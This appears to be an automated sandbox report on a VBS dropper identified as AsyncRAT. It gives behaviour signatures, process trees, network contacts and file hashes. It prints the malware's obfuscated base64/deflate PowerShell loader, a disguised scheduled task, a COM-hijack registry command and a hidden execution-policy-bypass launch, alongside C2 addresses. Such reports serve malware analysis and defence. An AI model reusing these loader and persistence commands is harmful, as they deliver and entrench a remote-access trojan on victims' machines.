Analysis Overview
SHA256
343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663
Threat Level: Known bad
The file CSSA876245.vbs was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Event Triggered Execution: Component Object Model Hijacking
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Modifies registry key
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-17 07:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-17 07:13
Reported
2024-09-17 07:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1628 wrote to memory of 2360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1628 wrote to memory of 2360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1628 wrote to memory of 2360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2360 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2360 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2360 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
Files
memory/2360-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2360-5-0x000000001B820000-0x000000001BB02000-memory.dmp
memory/2360-6-0x00000000004B0000-0x00000000004B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 5e7e0ac6cf0ae479e0d8bbd7f214b26c |
| SHA1 | b408c68964283271d298a846965ffd29e1b1bf44 |
| SHA256 | 87d2b73b5be9ccc9602c3e81370536e8718cd0d54d1439e24333fdc74c0208b5 |
| SHA512 | 1b5458285923e5456a6eb77c6cc4a396c515dfb5d7195231d62fea64c3e410cb33ce28d77a5d84edd02be5de41360af6b83635afb8ca44150fffec8849738ff0 |
memory/2360-12-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2360-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2360-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2360-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-17 07:13
Reported
2024-09-17 07:15
Platform
win10v2004-20240802-en
Max time kernel
121s
Max time network
149s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 88.119.175.153:6606 | tcp | |
| US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp |
| US | 88.119.175.153:6606 | tcp |
Files
memory/3956-0-0x00007FFAED523000-0x00007FFAED525000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ohuera.zjr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3956-6-0x0000021842910000-0x0000021842932000-memory.dmp
memory/3956-11-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
memory/3956-12-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
memory/3956-22-0x00007FFAED523000-0x00007FFAED525000-memory.dmp
memory/3956-23-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8d089c855358969266a3275f0ec4f955 |
| SHA1 | 5ce30b598cfa0c2008541b1b549673401971dc3d |
| SHA256 | e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734 |
| SHA512 | f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320 |
memory/3956-32-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
C:\ProgramData\Cloud\cloud.vbs
| MD5 | 7079642a22a106d0ed6f227cc70899ae |
| SHA1 | 60dd57af3518c0ea4104379ad233b5982b231283 |
| SHA256 | b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724 |
| SHA512 | ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80 |
C:\ProgramData\Cloud\cloud.bat
| MD5 | b8bdfc7895feaaacba3711d17be6778a |
| SHA1 | fa0bc12827b348fe540a13683897deb207650df7 |
| SHA256 | e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3 |
| SHA512 | ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156 |
C:\ProgramData\Cloud\cloud.ps1
| MD5 | 81fe8fe5684ecf16d936250bb94c852a |
| SHA1 | a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40 |
| SHA256 | ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584 |
